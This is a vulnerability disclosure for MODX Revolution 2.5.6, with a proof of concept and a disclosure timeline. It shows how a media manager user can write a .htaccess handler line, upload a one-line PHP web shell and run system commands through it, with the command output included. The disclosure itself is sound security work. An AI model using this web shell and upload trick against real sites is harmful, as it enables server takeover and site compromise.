|Name:||MODX Revolution 2.5.6|
|Vulnerability:||PHP code execution|
|Prerequisites:||attacker needs to be authenticated user with with media manager permission|
User with media manager permissions can edit and upload files. This functionality can be used to execute PHP code on the server.
Proof of Concept
Attacker accesses the media browser to edit and uplaod files. Since the application prevents the attacker from uploading PHP files directly, she/he can still edit .htaccess file. This can be used to instruct the web-server to execute various files as PHP, leading to code execution on the server and site compromise.
Following scenario demonstrates the issue on Apache web-server.
Media Browser: http://victim.site/manager/?a=media/browser
Attacker edits or uploads a .htaccess file with the following content on the server:
AddHandler application/x-httpd-php .z
This instructs the Apache to execute .z files as PHP. Next, the attacker uploads a shell.z on the server and executes it.
<?php $r=$_REQUEST;if(isset($r['x'])) $r['x']($r['c']);
Attacker can execute PHP on the server by accessing the uploaded file directly: view-source:http://victim.site/shell.z?x=system&c=ls%20-lah
total 80K drwxrwx--- 1 www-data www-data 4.0K Apr 2 23:56 . drwxrwx--- 1 www-data www-data 12K Mar 31 17:54 .. -rwxrwx--- 1 www-data www-data 3.4K Apr 4 23:57 .htaccess drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 assets -rwxrwx--- 1 www-data www-data 285 Mar 31 16:52 config.core.php drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:00 connectors drwxrwx--- 1 www-data www-data 4.0K Mar 30 23:33 core -rwxrwx--- 1 www-data www-data 1.9K Mar 28 08:42 index.php drwxrwx--- 1 www-data www-data 4.0K Mar 28 09:01 manager -rwxrwx--- 1 www-data www-data 55 Apr 4 22:39 shell.z
Taking control over site's administrator or media manager account leads to full compromise, since it is possible to execute PHP. Any WCI (a.k.a XSS) vulnerability present in the MODX core or any of the third-party plugins can possibly be used to take control over the administrator's or media manager's session. This means, that a single WCI vulnerability could be used to execute PHP code and compromise the site.
Attacker with permissions or access to account to access media manager can execute PHP code on the server.
Following release has been published mitigating the issue: https://modx.com/blog/modx-revolution-2.5.7
- 01.04.2017 | me > developer | vulnerability discovered
- 03.04.2017 | me > developer | sent the report to the developers
- 13.04.2017 | developer > me | acknowledged the finding
- 21.04.2017 | developer > public | new version released
- 01.05.2017 | me > public | full disclosure